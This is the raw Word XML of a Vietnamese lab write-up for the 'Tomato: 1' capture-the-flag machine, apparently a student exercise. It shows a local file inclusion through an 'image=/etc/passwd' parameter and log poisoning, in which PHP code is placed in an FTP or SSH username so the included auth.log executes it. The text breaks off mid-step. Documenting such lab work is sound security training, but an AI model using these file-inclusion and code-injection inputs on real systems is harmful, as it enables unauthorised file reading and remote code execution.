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8E0BD" w14:textId="77777777" w:rsidR="004235C9" w:rsidRPr="004235C9" w:rsidRDefault="004235C9" w:rsidP="004235C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab3: </w:t>
      </w:r>
      <w:r w:rsidRPr="004235C9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tomato: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1A5DDF" w14:textId="7B0BB7A8" w:rsidR="0002152D" w:rsidRDefault="004235C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mô tả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F773C1C" w14:textId="77777777" w:rsidR="0099324F" w:rsidRPr="0099324F" w:rsidRDefault="0099324F" w:rsidP="0099324F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099324F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Độ khó: Trung bình đến Khó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C49D863" w14:textId="77777777" w:rsidR="0099324F" w:rsidRPr="0099324F" w:rsidRDefault="0099324F" w:rsidP="0099324F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099324F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Đã thử nghiệm: VMware Workstation 15.x Pro (Hoạt động tốt hơn với VMware thay vì VirtualBox)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E66FB0" w14:textId="2CF8D6DE" w:rsidR="0099324F" w:rsidRPr="0099324F" w:rsidRDefault="0099324F" w:rsidP="0099324F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099324F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mục tiêu: Lấy shell gốc ie(root@localhost:~#) và sau đó lấy cờ dưới /root).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AFC0C6" w14:textId="7EDADA62" w:rsidR="0099324F" w:rsidRDefault="0099324F" w:rsidP="0099324F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356BC3B5" w14:textId="4CE3CD8E" w:rsidR="004235C9" w:rsidRPr="00836DDA" w:rsidRDefault="00B64A19">
      <w:r>
        <w:t xml:space="preserve">Sử dụng nmap để tìm kiêm </w:t>
      </w:r>
      <w:r w:rsidR="00836DDA">
        <w:t>địa chỉ của máy lab và các dịch vụ của nó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653DA85F" w14:textId="7EAFA456" w:rsidR="004235C9" w:rsidRDefault="004235C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004235C9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33406E4E" wp14:editId="4F261632">
            <wp:extent cx="5731510" cy="2897505"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7533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76833" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2897505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0C8026" w14:textId="0D7FA396" w:rsidR="003A6C74" w:rsidRDefault="00836DDA">
      <w:r>
        <w:t>Kết quả trả về cho biết máy ảo có địa chỉ 10.10.10.</w:t>
      </w:r>
      <w:r w:rsidR="00C73990">
        <w:t>136</w:t>
      </w:r>
      <w:r w:rsidR="003A6C74">
        <w:t xml:space="preserve"> cùng với dịch vụ ftp ở cổng 21, http ở cổng 80 và 8888, ssh ở cổng 2211.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D71B4B1" w14:textId="71334171" w:rsidR="003A6C74" w:rsidRDefault="003A6C74">
      <w:r>
        <w:t>Truy cập vào dịch vụ web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225D6272" w14:textId="64EA0377" w:rsidR="00C73990" w:rsidRDefault="00C73990">
      <w:r w:rsidRPr="00C73990">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0093E71E" wp14:editId="3E1FD66C">
            <wp:extent cx="5731510" cy="2776855"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="180528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89662" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2776855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EEF593" w14:textId="7F1A702A" w:rsidR="00C73990" w:rsidRDefault="00C73990">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Kết quả trả về 1 bức ảnh quả cà chua và không có gì có thể khai thác </w:t>
      </w:r>
      <w:r w:rsidR="00E46503">
        <w:t>thêm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBD8920" w14:textId="40F83101" w:rsidR="00E46503" w:rsidRDefault="00E46503">
      <w:r>
        <w:t>Thực hiện</w:t>
      </w:r>
      <w:r w:rsidR="001962A0">
        <w:t xml:space="preserve"> tấn công từ điền tìm kiếm các </w:t>
      </w:r>
      <w:r w:rsidR="009E2EB5">
        <w:t xml:space="preserve">tệp </w:t>
      </w:r>
      <w:r w:rsidR="001962A0">
        <w:t>ẩn của trang web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390D3061" w14:textId="12F9046E" w:rsidR="001962A0" w:rsidRDefault="006E0A0C">
      <w:r w:rsidRPr="006E0A0C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="762B98B8" wp14:editId="69CD407C">
            <wp:extent cx="5731510" cy="3937000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="36836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66305" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3937000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E34BF84" w14:textId="77777777" w:rsidR="006E0A0C" w:rsidRDefault="006E0A0C"/>
    <w:p w14:paraId="5CAE2B11" w14:textId="6C8BB43B" w:rsidR="006E0A0C" w:rsidRDefault="009E2EB5">
      <w:r>
        <w:t xml:space="preserve">Kết quả trả về cho thấy đã phát hiện được 3 vị trí </w:t>
      </w:r>
      <w:r w:rsidR="00390A32">
        <w:t>ẩn</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA47C87" w14:textId="17199F63" w:rsidR="009E2EB5" w:rsidRDefault="009E2EB5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Truy cập vào thư mục /</w:t>
      </w:r>
      <w:r w:rsidR="00390A32">
        <w:t>antibot_image:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39235AA7" w14:textId="288FD3F3" w:rsidR="00390A32" w:rsidRDefault="00390A32" w:rsidP="00C52493">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00390A32">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30C2EB58" wp14:editId="1E1DC79C">
            <wp:extent cx="5074920" cy="3329940"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="192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6" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5074920" cy="3329940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="333D3A6A" w14:textId="747258D7" w:rsidR="00782586" w:rsidRDefault="00782586">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Truy cập</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vào thư mục info.php:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F44F317" w14:textId="1D4861AD" w:rsidR="00782586" w:rsidRDefault="00782586">
      <w:r w:rsidRPr="00782586">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CD7DE98" wp14:editId="4CF55CD2">
            <wp:extent cx="5731510" cy="2697480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="40776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67312" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2697480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFC0044" w14:textId="7CF78746" w:rsidR="00C52493" w:rsidRDefault="00C52493">
      <w:r w:rsidRPr="00C52493">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F0D7646" wp14:editId="742C89EF">
            <wp:extent cx="5731510" cy="3181985"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="114993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1291" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3181985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE3912C" w14:textId="1946A4A9" w:rsidR="00C52493" w:rsidRDefault="00C52493">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ED0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trong kết quả phản hồi của trang web này có một đoạn comment </w:t>
      </w:r>
      <w:r w:rsidR="009123FD">
        <w:t xml:space="preserve">về lệnh include trong php. Đây có thể là gợi ý của bài này cho </w:t>
      </w:r>
      <w:r w:rsidR="00394B40">
        <w:t xml:space="preserve">biết có thể có lệnh include như trên ở trong info.php. Thử đưa vào url tham số </w:t>
      </w:r>
      <w:r w:rsidR="00394B40" w:rsidRPr="00E32AC0">
        <w:rPr>
          <w:color w:val="ED0000"/>
        </w:rPr>
        <w:t>image=/etc/</w:t>
      </w:r>
      <w:r w:rsidR="00E32AC0">
        <w:rPr>
          <w:color w:val="ED0000"/>
        </w:rPr>
        <w:t>password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B360E9C" w14:textId="63BA3B1D" w:rsidR="00E32AC0" w:rsidRDefault="00E32AC0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E32AC0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A7AC1F7" wp14:editId="67B5DB62">
            <wp:extent cx="5731510" cy="2870200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="141441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1796" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2870200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D539BE" w14:textId="4180B7BA" w:rsidR="00E32AC0" w:rsidRDefault="00E32AC0">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kết</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> quả trả về cho thấy thông tin trong tệp </w:t>
      </w:r>
      <w:r w:rsidR="009338E1">
        <w:t>/etc/passwd đã được đưa lên web. Từ đó cho biết rằng lệnh include đã được thực thi trên trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682CEF8E" w14:textId="7789FFFC" w:rsidR="00790F5B" w:rsidRDefault="00790F5B">
      <w:r>
        <w:t xml:space="preserve">Ngoài ra, trong </w:t>
      </w:r>
      <w:r w:rsidR="00E1506F">
        <w:t>linux có tệp tin /var/log/auth.log chứa các ghi chép về các hoạt động liên quan đến xác thực và quyền truy cập.Thử truy cập vào tệp này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15295683" w14:textId="7586CD01" w:rsidR="00A8452E" w:rsidRDefault="00A8452E">
      <w:r w:rsidRPr="00A8452E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F7396F3" wp14:editId="1435FBE0">
            <wp:extent cx="5731510" cy="904240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1856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4907" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="904240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="596BA558" w14:textId="185955FE" w:rsidR="00A8452E" w:rsidRDefault="00A8452E">
      <w:r>
        <w:t xml:space="preserve">Kết quả </w:t>
      </w:r>
      <w:r w:rsidR="00254C07">
        <w:t>trả về cho biết có một phiên kết nối của root đã được đóng và mở theo lịch được lập sẵn (cron)</w:t>
      </w:r>
      <w:r w:rsidR="00C41422">
        <w:t>. Trong lúc thực hiện nmap, chúng ta đã phát hiện ra rằng có dịch vụ ftp và ssh đang được mở trên máy lab, thử thực hiện kết nối vào máy lab từ hai giao thức này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0695DBB4" w14:textId="377BB8C3" w:rsidR="00C41422" w:rsidRDefault="00C41422">
      <w:r>
        <w:t>Kết nối qua ftp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597C76BB" w14:textId="05762D6F" w:rsidR="00805977" w:rsidRDefault="00805977">
      <w:r w:rsidRPr="00805977">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21B9BBB1" wp14:editId="61F2B296">
            <wp:extent cx="5731510" cy="2297430"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="98127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79884" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2297430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC5CD5E" w14:textId="5508EB2E" w:rsidR="00805977" w:rsidRDefault="00805977">
      <w:r>
        <w:t>Xem lại tệp auth.log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6C46A7" w14:textId="0B87EA42" w:rsidR="006D3244" w:rsidRDefault="006D3244">
      <w:r w:rsidRPr="006D3244">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7832A60A" wp14:editId="1771BE16">
            <wp:extent cx="5731510" cy="173355"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="85567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78465" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="173355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D03BC84" w14:textId="77777777" w:rsidR="00297CFD" w:rsidRDefault="006D3244">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Kết quả trả về cho biết có một lần đăng nhập thất bại có tên người dùng(ruser) là c</w:t>
      </w:r>
      <w:r w:rsidR="00F163E8">
        <w:t>aoquanghuy. Hiện tại trang web sử dụng hàm include</w:t>
      </w:r>
      <w:r w:rsidR="00660DAD">
        <w:t xml:space="preserve"> để gọi đến tệp auth.log. Mà trang web là một tệp php nên có thể thay tên đăng nhập thành một thẻ php</w:t>
      </w:r>
      <w:r w:rsidR="00671AA1">
        <w:t xml:space="preserve"> (&lt;?php....?&gt;)</w:t>
      </w:r>
      <w:r w:rsidR="00660DAD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00671AA1">
        <w:t xml:space="preserve">chứa đoạn mã php mà ta muốn đưa vào. Sau khi trang web include sang lấy dữ liệu từ tệp auth, nó có thể đưa trực tiếp lệnh php lên và thực thi </w:t>
      </w:r>
      <w:r w:rsidR="00297CFD">
        <w:t>nó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717D5F5E" w14:textId="771309CE" w:rsidR="00127DA2" w:rsidRDefault="00297CFD">
      <w:r>
        <w:t>Thay đổi tên thành &lt;?php phpinfo();?&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00012B0A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559938EF" w14:textId="77777777" w:rsidR="00012B0A" w:rsidRDefault="00127DA2">
      <w:r w:rsidRPr="00127DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00F64005" wp14:editId="0202C102">
            <wp:extent cx="5201376" cy="2495898"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="114077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79478" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5201376" cy="2495898"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="748790D0" w14:textId="71FC4C96" w:rsidR="006D3244" w:rsidRDefault="00012B0A">
      <w:r>
        <w:t>Kết quả trong tệp auth.log</w:t>
      </w:r>
      <w:r w:rsidR="00297CFD">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D148362" w14:textId="0876B3FE" w:rsidR="00012B0A" w:rsidRDefault="00012B0A">
      <w:r w:rsidRPr="00012B0A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CE3CE58" wp14:editId="76D03443">
            <wp:extent cx="5731510" cy="866775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="211692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28053" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="866775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B308D43" w14:textId="77777777" w:rsidR="001149A9" w:rsidRDefault="00012B0A">
      <w:r>
        <w:t xml:space="preserve">Kết quả trả về không có </w:t>
      </w:r>
      <w:r w:rsidR="001149A9">
        <w:t xml:space="preserve">thông tin đăng nhập thất bại của username mang lệnh php hay là lệnh php được thực thi. Vậy là kết nối bằng ftp không thực hiện được. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27219278" w14:textId="1C0FF4D7" w:rsidR="00012B0A" w:rsidRPr="00E32AC0" w:rsidRDefault="001149A9">
      <w:r>
        <w:t>Chuyển qua ssh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430B739E" w14:textId="026D2123" w:rsidR="00782586" w:rsidRDefault="00324114">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00680FBC" w:rsidRPr="00680FBC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00680FBC" w:rsidRPr="00680FBC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7654FA42" wp14:editId="54BD186D">
            <wp:extent cx="5731510" cy="1620520"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="115246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68719" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1620520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54350D1E" w14:textId="287592BB" w:rsidR="00680FBC" w:rsidRDefault="00680FBC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Kết quả trong file auth.log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD3E56E" w14:textId="7A97EA2E" w:rsidR="001A3776" w:rsidRDefault="001A3776">
      <w:r w:rsidRPr="001A3776">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30FFD801" wp14:editId="3D669142">
            <wp:extent cx="5731510" cy="913765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="50753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7869" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="913765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D00E8E7" w14:textId="78C02188" w:rsidR="001A3776" w:rsidRDefault="001A3776">
      <w:r>
        <w:t>Thông tin cho thấy người dùng caoquanghuy đăng nhập ssh không thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE4BAD2" w14:textId="09FFBCE3" w:rsidR="001A3776" w:rsidRDefault="001A3776">
      <w:r>
        <w:t>Đổi caoquanghuy thành lệnh php:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582EAC19" w14:textId="1AE60FE8" w:rsidR="001A3776" w:rsidRDefault="00A83992">
      <w:r w:rsidRPr="00A83992">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06FCF7A6" wp14:editId="0878B685">
            <wp:extent cx="5731510" cy="1158240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="39576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69295" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
